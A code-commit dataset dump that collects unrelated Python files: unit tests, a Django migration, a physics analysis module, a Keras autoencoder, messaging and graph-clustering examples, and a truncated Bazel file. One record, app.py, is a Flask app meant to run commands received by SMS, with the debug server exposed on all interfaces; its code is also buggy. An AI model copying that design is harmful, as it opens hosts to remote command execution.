5d7e4615657d947ec4a7500433f7008de223b622 | Add test | darkfeline/mir.dlsite,darkfeline/mir.dlsite | tests/test_dllist.py | tests/test_dllist.py | # Copyright (C) 2016, 2017 Allen Li
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import sys
def test_dllist():
proc = subprocess.run([sys.executable, '-m', 'mir.dlsite.cmd.dllist', '--no-info'],
input=b'foo RJ12345 bar\nbad\n',
stdout=subprocess.PIPE)
assert proc.stdout == b'RJ12345\n'
| apache-2.0 | Python | |
08613bb395b4c964b15307165c7f472b59061da8 | Add tests for encode | tyrannosaurus/termformat | tests/test_encode.py | tests/test_encode.py | import termformat
from unittest import TestCase
class LargeMock:
def __len__(self):
return 4294967296
class LargeAtomMock(LargeMock, str):
pass
class LargeListMock(LargeMock, list):
pass
class LargeTupleMock(LargeMock, tuple):
pass
class LargeStringMock(LargeMock, str):
pass
class TermFormatEncoderTest(TestCase):
def test_encode_false(self):
bytes = termformat.encode(False)
self.assertEqual(bytes, b'\x83d\x00\x05false')
def test_encode_true(self):
bytes = termformat.encode(True)
self.assertEqual(bytes, b'\x83d\x00\x04true')
def test_encode_none(self):
bytes = termformat.encode(None)
self.assertEqual(bytes, b'\x83d\x00\x03nil')
def test_encode_small_int(self):
bytes = termformat.encode(20)
self.assertEqual(bytes, b'\x83a\x14')
def test_encode_medium_int(self):
bytes = termformat.encode(300)
self.assertEqual(bytes, b'\x83b\x00\x00\x01,')
def test_encode_large_int(self):
bytes = termformat.encode(4294967296)
self.assertEqual(bytes, b'\x83n\x05\x00\x00\x00\x00\x00\x01')
def test_encode_large_negative_int(self):
bytes = termformat.encode(-4294967296)
self.assertEqual(bytes, b'\x83n\x05\x01\x00\x00\x00\x00\x01')
def test_encode_float(self):
bytes = termformat.encode(3.14)
self.assertEqual(bytes, b'\x83F@\t\x1e\xb8Q\xeb\x85\x1f')
def test_encode_list(self):
bytes = termformat.encode([1, 2, 3])
self.assertEqual(bytes, b'\x83l\x00\x00\x00\x03a\x01a\x02a\x03j')
def test_encode_empty_list(self):
bytes = termformat.encode([])
self.assertEqual(bytes, b'\x83j')
def test_encode_large_list(self):
with self.assertRaises(ValueError):
list = LargeListMock()
bytes = termformat.encode(list)
def test_encode_small_tuple(self):
bytes = termformat.encode((1, 2, 3))
self.assertEqual(bytes, b'\x83h\x03a\x01a\x02a\x03')
def test_encode_large_tuple(self):
bytes = termformat.encode((1, 2, 3) * 256)
self.assertEqual(bytes[:5], b'\x83i\x00\x00\x03')
def test_encode_very_large_tuple(self):
with self.assertRaises(ValueError):
tuple = LargeTupleMock()
bytes = termformat.encode(tuple)
def test_encode_atom(self):
bytes = termformat.encode(":foo")
self.assertEqual(bytes, b'\x83d\x00\x03foo')
def test_encode_atom_without_name(self):
with self.assertRaises(ValueError):
bytes = termformat.encode(":")
def test_encode_large_atom(self):
with self.assertRaises(ValueError):
atom = LargeAtomMock()
bytes = termformat.encode(atom)
def test_encode_not_supported_data_type(self):
with self.assertRaises(ValueError):
bytes = termformat.encode({'dictionary': 'item'})
def test_encode_string(self):
bytes = termformat.encode('foo')
self.assertEqual(bytes, b'\x83m\x00\x00\x00\x03foo')
def test_encode_empty_string(self):
bytes = termformat.encode('')
self.assertEqual(bytes, b'\x83m\x00\x00\x00\x00')
def test_encode_large_string(self):
with self.assertRaises(ValueError):
string = LargeStringMock()
bytes = termformat.encode(string)
def test_encode_unicode(self):
bytes = termformat.encode(u'foo')
self.assertEqual(bytes, b'\x83m\x00\x00\x00\x03foo')
def test_encode_bytes(self):
bytes = termformat.encode(b'foo')
self.assertEqual(bytes, b'\x83m\x00\x00\x00\x03foo')
| mit | Python | |
722b11eab90c6d532ea96209f7632e17181c0b3e | Test if points are in footprint | NLeSC/PattyAnalytics | tests/test_inpoly.py | tests/test_inpoly.py | import unittest
import pcl
import numpy as np
from patty_registration.conversions import loadLas, loadCsvPolygon
from numpy.testing import assert_array_equal, assert_array_almost_equal
from matplotlib import path
class TestInPoly(unittest.TestCase):
def testInPoly(self):
fileLas = 'data/footprints/162.las'
filePoly = 'data/footprints/162.las_footprint.csv'
pc = loadLas(fileLas)
footprint = loadCsvPolygon(filePoly)
pc2 = points_in_poly(pc, footprint)
def point_in_poly(point, polyPath):
return polyPath.contains_point(point[:2])
def points_in_poly(pc, poly):
polyPath = path.Path(poly[:,:2])
points = np.asarray(pc)
return np.array([ point for point in points if point_in_poly(point+pc.offset, polyPath) ])
| apache-2.0 | Python | |
01494bfbc15987a2b925ca7990e8704767c9457b | Create secret.py | DmytroLitvinov/kuna | tests/secret.py | tests/secret.py | public_key = 'xxx'
private_key = 'yyy'
| mit | Python | |
6b132720c1f7596db34a2fdab3f6ca0134aaabc9 | create new model to store uploaded images with id | openego/oeplatform,openego/oeplatform,openego/oeplatform,openego/oeplatform | api/migrations/0001_initial.py | api/migrations/0001_initial.py | # Generated by Django 3.0 on 2020-11-07 13:11
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UploadedImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='image/%Y/')),
],
),
]
| agpl-3.0 | Python | |
ca90d083005e1c29b3b394d556296fd8e734c40a | implement top extrapolation module | morgenst/PyAnalysisTools,morgenst/PyAnalysisTools,morgenst/PyAnalysisTools | PyAnalysisTools/AnalysisTools/TopExtrapolationModule.py | PyAnalysisTools/AnalysisTools/TopExtrapolationModule.py | from PyAnalysisTools.base import _logger
import ROOT
class TopExtrapolationModule(object):
def __init__(self, **kwargs):
_logger.debug('Initialising TopExtrapolationModule')
self.build_functions(**kwargs)
self.type = "DataModifier"
def build_functions(self, **kwargs):
def build_fct(name, params):
fcts = [kwargs['functions'][name]] * 3
for i, param in enumerate(params):
param = eval(param)
fcts[0] = fcts[0].replace('[{:d}]'.format(i), str(param[0]))
fcts[1] = fcts[1].replace('[{:d}]'.format(i), str(param[0] - param[1]))
fcts[2] = fcts[2].replace('[{:d}]'.format(i), str(param[0] + param[1]))
return map(lambda f: ROOT.TF1("", f), fcts)
self.functions = {}
for reg_name, cfg in kwargs.iteritems():
if reg_name == 'functions':
continue
self.functions[reg_name] = build_fct(cfg['func'], cfg['params']), cfg['stitch']
def get_extrapolated_bin_content(self, region, xmin, xmax=None, lumi=1.):
if xmax is None:
xmax = 1e12
if xmin < self.functions[region][1]:
return None
return lumi * self.functions[region][0][0].Integral(xmin, xmax)
def execute(self, histograms):
top_hist = histograms['ttbar']
region = [r for r in self.functions.keys() if r in top_hist.GetName()][0]
print region
for i in range(top_hist.GetNbinsX() + 1):
bin_content = self.get_extrapolated_bin_content(region, top_hist.GetXaxis().GetBinLowEdge(i),
top_hist.GetXaxis().GetBinUpEdge(i), 139.)
if bin_content is None:
continue
top_hist.SetBinContent(i, bin_content)
| mit | Python | |
181ca07d3d7bdb3e07b8f9e608ebd8e42235a38c | test module; | terentjew-alexey/market-analysis-system | mas_vae/models.py | mas_vae/models.py | from keras import backend as K
from keras.models import Model, Sequential
from keras.layers import Input, Dense, concatenate
from keras.layers import Flatten, Reshape, BatchNormalization
from keras.layers import Conv2D, MaxPooling2D, Conv2DTranspose
from mas_tools.ml import save_model_arch
def deep_conv2d_ae(input_shape):
latent_dim = 32
kernel_size = (1, 5)
kernel_pooling = (1, 2)
strides = (1, 1)
# Encoder
input_tensor = Input(shape=input_shape, name='encoder_input')
x = Conv2D(filters=32,
kernel_size=kernel_size,
padding='same',
activation='relu',
strides=strides,
input_shape=input_shape)(input_tensor)
x = Conv2D(filters=64,
kernel_size=kernel_size,
padding='same',
activation='relu',
strides=strides)(x)
# shape info needed to build decoder model
shape = K.int_shape(x)
# shape = enc.output_shape
# generate latent vector Q(z|X)
x = Flatten()(x)
x = Dense(latent_dim, activation='relu', name='encoder_output')(x)
# Decoder
latent_inputs = Input(shape=(latent_dim,), name='latent_input')
y = Dense(shape[1] * shape[2] * shape[3], activation='relu')(latent_inputs)
y = Reshape((shape[1], shape[2], shape[3]))(y)
y = Conv2DTranspose(filters=64,
kernel_size=kernel_size,
padding='same',
activation='relu',
strides=strides)(y)
y = Conv2DTranspose(filters=32,
kernel_size=kernel_size,
padding='same',
activation='relu',
strides=strides)(y)
y = Conv2DTranspose(filters=1,
kernel_size=kernel_size,
padding='same',
activation='relu',
strides=strides,
name='decoder_output')(y)
# Create models
encoder = Model(input_tensor, x, name='encoder')
decoder = Model(latent_inputs, y, name='decoder')
autoencoder = Model(input_tensor, decoder(encoder(input_tensor)), name='ae')
return encoder, decoder, autoencoder
if __name__ == "__main__":
path = 'E:/Projects/market-analysis-system/'
enc, dec, ae = deep_conv2d_ae((4, 20, 1))
save_model_arch(enc, path+'ae_enc')
enc.summary()
save_model_arch(dec, path+'ae_dec')
dec.summary()
save_model_arch(ae, path+'ae')
ae.summary()
| mit | Python | |
0515cdac701b6fbd4bb9281b6412313ad31072cc | Add file to run flask app | ueg1990/twilix,ueg1990/twilix | app.py | app.py | from flask import Flask, request
from twilio import twiml
import subprocess
from cmd import cmds
app = Flask(__name__)
import os
ACCOUNT_SID = "" #os.environ['ACCOUNT_SID']
AUTH_TOKEN = "" #os.environ['AUTH_TOKEN']
APP_SID = "Twilix" #os.environ['APP_SID']
CALLER_ID = "+14389855700" #os.environ['CALLER_ID']
#CALLER_ID = "+18175985398" #os.environ['CALLER_ID']
@app.route("/")
def index():
return "Hello, world, motherfucker!!!"
@app.route('/sms', methods=['POST'])
def sms():
response = twiml.Response()
user_input = request.form['Body']
if '|' in user_input:
pass
else:
args = user_input.lower().spit()
output = args[0](args[1:])
response.sms(output)
return str(response)
if __name__ == "__main__":
#app.run(debug=True)
app.debug = True
app.run(host='0.0.0.0')
| mit | Python | |
a0ee0998457976aa45b3d3a462f2b2aab1bfb15f | add objects module | sandybee/python-crossprocess-transient-object | crossprocess/objects.py | crossprocess/objects.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
class SimpleObject(object):
def __init__(self, name):
self.__name = name
def get_name(self):
return self.__name
| mit | Python | |
8c276c8c2e45ff0fe634669ea65d0df40c96463c | Add python example using metadata | mapequation/infomap,mapequation/infomap,mapequation/infomap,mapequation/infomap | examples/python/metadata.py | examples/python/metadata.py | from infomap import infomap
myInfomap = infomap.Infomap("--two-level --meta-data-rate 0.3")
# Add weight as an optional third argument
myInfomap.addLink(0, 1)
myInfomap.addLink(0, 2)
myInfomap.addLink(0, 3)
myInfomap.addLink(1, 0)
myInfomap.addLink(1, 2)
myInfomap.addLink(2, 1)
myInfomap.addLink(2, 0)
myInfomap.addLink(3, 0)
myInfomap.addLink(3, 4)
myInfomap.addLink(3, 5)
myInfomap.addLink(4, 3)
myInfomap.addLink(4, 5)
myInfomap.addLink(5, 4)
myInfomap.addLink(5, 3)
network = myInfomap.network()
network.addMetaData(0, 1)
network.addMetaData(1, 1)
network.addMetaData(2, 2)
network.addMetaData(3, 2)
network.addMetaData(4, 3)
network.addMetaData(5, 3)
myInfomap.run()
print(f"Found {myInfomap.numTopModules()} modules with codelength: {myInfomap.codelength()}")
print("\n#node module")
for node,module in myInfomap.getModules().items():
print(f"{node} {module}")
| agpl-3.0 | Python | |
7115d25c57404a42bc29513eb514073747d876ce | Add platform_map to remap Platform.os and arch based on config | nerdvegas/rez,instinct-vfx/rez,nerdvegas/rez,instinct-vfx/rez | src/rez/utils/platform_mapped.py | src/rez/utils/platform_mapped.py | import re
def platform_mapped(func):
"""
Decorates functions for lookups within a config.platform_map dictionary.
The first level key is mapped to the func.__name__ of the decorated function.
Regular expressions are used on the second level key, values.
Note that there is no guaranteed order within the dictionary evaluation. Only the first matching
regular expression is being used.
For example:
config.platform_map = {
"os": {
r"Scientific Linux-(.*)": r"Scientific-\1", # Scientific Linux-x.x -> Scientific-x.x
r"Ubuntu-14.\d": r"Ubuntu-14, # Any Ubuntu-14.x -> Ubuntu-14
},
"arch": {
"x86_64": "64bit", # Maps both x86_64 and amd64 -> 64bit
"amd64": "64bit",
},
}
"""
def inner(*args, **kwargs):
# Since platform is being used within config lazy import config to prevent circular dependencies
from rez.config import config
# Original result
result = func(*args, **kwargs)
# The function name is used as primary key
if func.__name__ in config.platform_map:
for key, value in config.platform_map[func.__name__].iteritems():
result, changes = re.subn(key, value, result)
if changes > 0:
break
return result
return result
return inner
| apache-2.0 | Python | |
904a37589d8ef0f7b69d9b0f83f41c94fbbfcde6 | Update 1.7 migrations | aldryn/aldryn-categories,aldryn/aldryn-categories | aldryn_categories/migrations/0003_auto_20150128_1359.py | aldryn_categories/migrations/0003_auto_20150128_1359.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('aldryn_categories', '0002_auto_20150109_1415'),
]
operations = [
migrations.AlterField(
model_name='categorytranslation',
name='language_code',
field=models.CharField(db_index=True, max_length=15, verbose_name='Language', choices=[(b'en', b'English'), (b'de', b'German'), (b'fr', b'French')]),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='categorytranslation',
unique_together=set([('language_code', 'master'), ('language_code', 'slug')]),
),
]
| bsd-3-clause | Python | |
8a1448ed3bd426d11f6222d63f77604ec132b2da | Add an example for pre signed URL | openstack/python-zaqarclient | examples/signed_url_auth.py | examples/signed_url_auth.py | # Copyright 2016 Catalyst IT Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from zaqarclient.queues.v2 import client
URL = 'http://localhost:8888'
def create_post_delete(queue_name, messages):
"""Presigned queue example
Creates a queue, posts messages to it and finally deletes it with
``signed-url`` auth strategy enabled on Zaqar server side.
:params queue_name: The name of the queue
:type queue_name: `six.text_type`
:params messages: Messages to post.
:type messages: list
"""
conf = {'auth_opts':
{'backend': 'signed-url',
'options': {'signature': '',
'expires': '',
'methods': ['GET', 'PATCH', 'POST', 'PUT'],
'paths': ['/v2/queues/beijing/claims'],
'os_project_id': '2887aabf368046a3bb0070f1c0413470'}
}
}
cli = client.Client(URL, conf=conf)
queue = cli.queue(queue_name)
queue.post(messages)
for msg in queue.messages(echo=True):
print(msg.body)
msg.delete()
if __name__ == '__main__':
messages = [{'body': {'id': idx}, 'ttl': 360}
for idx in range(20)]
create_post_delete('beijing', messages)
| apache-2.0 | Python | |
59f37975bb06edd38bbcdea6f0ea031f079ba2c3 | Add an utility function to load YAML | hawaii-desktop/builder,hawaii-desktop/builder,hawaii-desktop/builder,hawaii-desktop/builder,hawaii-desktop/builder | lib/hawaiibuildbot/common/utils.py | lib/hawaiibuildbot/common/utils.py | #
# This file is part of Hawaii.
#
# Copyright (C) 2015 Pier Luigi Fiorini <pierluigi.fiorini@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
def loadYaml(fileName):
from yaml import load
try:
from yaml import CLoader as Loader
except ImportError:
from yaml import Loader
stream = open(fileName, "r")
return load(stream, Loader=Loader)
| agpl-3.0 | Python | |
e5a7f3fec4dc30273e582ac1a4d0374f42175c76 | Add rough script to import version data from prod API for an add-on (#13869) | bqbn/addons-server,diox/olympia,diox/olympia,eviljeff/olympia,bqbn/addons-server,wagnerand/addons-server,diox/olympia,mozilla/olympia,bqbn/addons-server,mozilla/addons-server,wagnerand/addons-server,diox/olympia,eviljeff/olympia,mozilla/addons-server,mozilla/olympia,mozilla/addons-server,wagnerand/addons-server,mozilla/addons-server,wagnerand/addons-server,mozilla/olympia,mozilla/olympia,eviljeff/olympia,eviljeff/olympia,bqbn/addons-server | src/olympia/landfill/management/commands/fetch_prod_versions.py | src/olympia/landfill/management/commands/fetch_prod_versions.py | import requests
from os.path import basename
from urllib.parse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management.base import BaseCommand, CommandError
from django.db.transaction import atomic
from olympia import amo
from olympia.amo.tests import version_factory
from olympia.addons.models import Addon
class KeyboardInterruptError(Exception):
pass
class Command(BaseCommand):
"""Download versions for a particular add-on from AMO public data."""
VERSIONS_API_URL = (
'https://addons.mozilla.org/api/v4/addons/addon/%(slug)s/versions/'
)
def add_arguments(self, parser):
parser.add_argument('slug', type=str)
def handle(self, *args, **options):
if not settings.DEBUG:
raise CommandError(
'As a safety precaution this command only works if DEBUG=True.'
)
self.fetch_versions_data(**options)
def get_max_pages(self, slug):
response = requests.get(self.VERSIONS_API_URL % {'slug': slug})
return response.json()['page_count']
def fetch_versions_data(self, **options):
self.addon = Addon.objects.get(slug=options['slug'])
slug = self.addon.slug
pages = range(1, self.get_max_pages(slug) + 1)
print('Fetching pages from 1 to %s' % max(pages))
for page in pages:
self._get_versions_from_page(slug, page)
def _get_versions_from_page(self, slug, page):
data = []
print('fetching %s' % page)
query_params = {
'page': page
}
response = requests.get(
self.VERSIONS_API_URL % {'slug': slug}, params=query_params)
print('fetched %s' % page)
for version in response.json()['results']:
self._handle_version(version)
return data
def _download_file(self, url, file_):
with storage.open(file_.current_file_path, 'wb') as f:
data = requests.get(url)
f.write(data.content)
def _handle_version(self, data):
if self.addon.versions(manager='unfiltered_for_relations').filter(
version=data['version']).exists():
print('Skipping %s (version already exists' % data['version'])
return
files_data = data['files'][0]
file_kw = {
'hash': files_data['hash'],
'filename': basename(urlparse(files_data['url']).path),
'status': amo.STATUS_CHOICES_API_LOOKUP[files_data['status']],
'platform': amo.PLATFORM_DICT[files_data['platform']].id,
'size': files_data['size'],
'is_webextension': files_data['is_webextension'],
'is_mozilla_signed_extension': (
files_data['is_mozilla_signed_extension']),
'strict_compatibility': (
data['is_strict_compatibility_enabled'])
}
version_kw = {
'version': data['version'],
# FIXME: maybe reviewed/created would make sense at least, to
# get more or less the correct ordering ?
# Everything else we don't really care about at the moment.
}
print('Creating version %s' % data['version'])
with atomic():
version = version_factory(
addon=self.addon, file_kw=file_kw, **version_kw)
# Download the file to the right path.
print('Downloading file for version %s' % data['version'])
self._download_file(files_data['url'], version.files.all()[0])
| bsd-3-clause | Python | |
275bf9c021c032b72c76010116aa05e0994ce631 | Add a basic test for loading grading records details overview page. | rhyolight/nupic.son,rhyolight/nupic.son,rhyolight/nupic.son | tests/app/soc/modules/gsoc/views/test_grading_record_details.py | tests/app/soc/modules/gsoc/views/test_grading_record_details.py | # Copyright 2013 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for grading record details views.
"""
from soc.modules.gsoc.logic import grading_record
from soc.modules.gsoc.models import grading_survey_group as gsg_model
from soc.modules.gsoc.models import project as project_model
from tests import profile_utils
from tests import survey_utils
from tests import test_utils
GRADING_SURVEY_GROUP_NAME = 'Test Grading Survey Group'
class GradingRecordsOverviewTest(test_utils.GSoCDjangoTestCase):
"""Test grading records overview list page.
"""
def setUp(self):
self.init()
self.data.createHost()
self.timeline.studentsAnnounced()
def createGradingSurveyGroup(self):
"""Create the grading survey group used to manager evaluations.
"""
evaluation_helper = survey_utils.SurveyHelper(self.gsoc, self.dev_test)
properties = {
'name': GRADING_SURVEY_GROUP_NAME,
'program': self.program,
'grading_survey': evaluation_helper.createMentorEvaluation(),
'student_survey': evaluation_helper.createStudentEvaluation(),
}
return self.seed(gsg_model.GSoCGradingSurveyGroup, properties)
def assertGradingRecordsOverviewTemplatesUsed(self, response):
"""Asserts that all templates from the withdraw projects page were used
and all contexts were passed
"""
self.assertTrue('base_layout' in response.context)
self.assertGSoCTemplatesUsed(response)
self.assertTemplateUsed(response,
'v2/modules/gsoc/grading_record/overview.html')
def testGradingRecordsOverviewGet(self):
grading_survey_group = self.createGradingSurveyGroup()
url = '/gsoc/grading_records/overview/%s/%d' % (
self.program.key().name(), grading_survey_group.key().id(),)
response = self.get(url)
self.assertResponseOK(response)
self.assertGradingRecordsOverviewTemplatesUsed(response)
# list response without any projects
response = self.getListResponse(url, 0)
self.assertIsJsonResponse(response)
data = response.context['data']['']
self.assertEqual(0, len(data))
# list response with projects
mentor_profile_helper = profile_utils.GSoCProfileHelper(
self.gsoc, self.dev_test)
mentor_profile_helper.createOtherUser('mentor@example.com')
mentor = mentor_profile_helper.createMentor(self.org)
self.data.createStudentWithProposal(self.org, mentor)
self.data.createStudentWithProject(self.org, mentor)
student_profile_helper = profile_utils.GSoCProfileHelper(
self.gsoc, self.dev_test)
student_profile_helper.createStudentWithProposal(self.org, mentor)
student_profile_helper.createStudentWithProject(self.org, mentor)
project = project_model.GSoCProject.all().ancestor(self.data.profile).get()
grading_record.updateOrCreateRecordsFor(grading_survey_group, [project])
response = self.getListResponse(url, 0)
self.assertIsJsonResponse(response)
data = response.context['data']['']
self.assertEqual(1, len(data))
| apache-2.0 | Python | |
8e58bf21cf39892df07d42d650619e2292b8efb5 | Create new package (#7796) | EmreAtes/spack,mfherbst/spack,tmerrick1/spack,krafczyk/spack,LLNL/spack,matthiasdiener/spack,iulian787/spack,tmerrick1/spack,tmerrick1/spack,mfherbst/spack,iulian787/spack,krafczyk/spack,krafczyk/spack,krafczyk/spack,tmerrick1/spack,tmerrick1/spack,mfherbst/spack,EmreAtes/spack,matthiasdiener/spack,EmreAtes/spack,mfherbst/spack,LLNL/spack,EmreAtes/spack,iulian787/spack,iulian787/spack,matthiasdiener/spack,krafczyk/spack,mfherbst/spack,LLNL/spack,LLNL/spack,iulian787/spack,matthiasdiener/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack | var/spack/repos/builtin/packages/perl-statistics-pca/package.py | var/spack/repos/builtin/packages/perl-statistics-pca/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PerlStatisticsPca(PerlPackage):
"""A simple Perl implementation of Principal Component Analysis."""
homepage = "http://search.cpan.org/~dsth/Statistics-PCA/lib/Statistics/PCA.pm"
url = "http://search.cpan.org/CPAN/authors/id/D/DS/DSTH/Statistics-PCA-0.0.1.tar.gz"
version('0.0.1', '6e0e05fe13f6becea525b973a0c29001')
depends_on('perl-module-build', type='build')
depends_on('perl-contextual-return', type=('build', 'run'))
depends_on('perl-text-simpletable', type=('build', 'run'))
depends_on('perl-math-matrixreal', type=('build', 'run'))
| lgpl-2.1 | Python | |
f6fc6960bf44c63fd854455efd3d5eff135d5877 | Fix failing build due to missing file | lassoan/SlicerSegmentEditorExtraEffects,lassoan/SlicerSegmentEditorExtraEffects | SegmentEditorSplitVolume/SegmentEditorSplitVolumeLib/__init__.py | SegmentEditorSplitVolume/SegmentEditorSplitVolumeLib/__init__.py | from SegmentEditorEffects.AbstractScriptedSegmentEditorEffect import *
from SegmentEditorEffects.AbstractScriptedSegmentEditorLabelEffect import *
from SegmentEditorEffect import *
| bsd-3-clause | Python | |
c81ecdf74f3e668559ed4c257e3cdfb1d95f376c | Add files via upload | bbarrows89/CSC110_Projects | myFirstPythonProgram.py | myFirstPythonProgram.py | # Bryan Barrows
# CSC 110 - 9830
# January 13th, 2017
# File: myFirstPythonProgram.py
# A simple program illustrating chaotic behavior.
def main():
print("This program illustrates a chaotic function")
x = eval(input("Enter a number between 0 and 1: "))
for i in range(10):
x = 3.9 * x * (1 - x)
print(x)
main()
| mit | Python | |
f3eb56111c115e65db6e55fcd1c69d695178b33b | Integrate LLVM at llvm/llvm-project@6144fc2da1b8 | tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,frreiss/tensorflow-fred,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,Intel-tensorflow/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,gautam1858/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,gautam1858/tensorflow,gautam1858/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,gautam1858/tensorflow,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-Corporation/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,Intel-Corporation/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,paolodedios/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,gautam1858/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-Corporation/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,frreiss/tensorflow-fred,karllessard/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,gautam1858/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,Intel-tensorflow/tensorflow,paolodedios/tensorflow,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,gautam1858/tensorflow,tensorflow/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,gautam1858/tensorflow,karllessard/tensorflow,Intel-tensorflow/tensorflow,Intel-Corporation/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow,tensorflow/tensorflow,Intel-Corporation/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,frreiss/tensorflow-fred,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,karllessard/tensorflow,tensorflow/tensorflow | third_party/llvm/workspace.bzl | third_party/llvm/workspace.bzl | """Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "6144fc2da1b87dc64ff887d73b60f7708f5cb0a4"
LLVM_SHA256 = "e6fe7c8df75bc1d3fb5f29758431e056406542768dd48333d32675dd4e06f1aa"
tf_http_archive(
name = name,
sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-" + LLVM_COMMIT,
urls = [
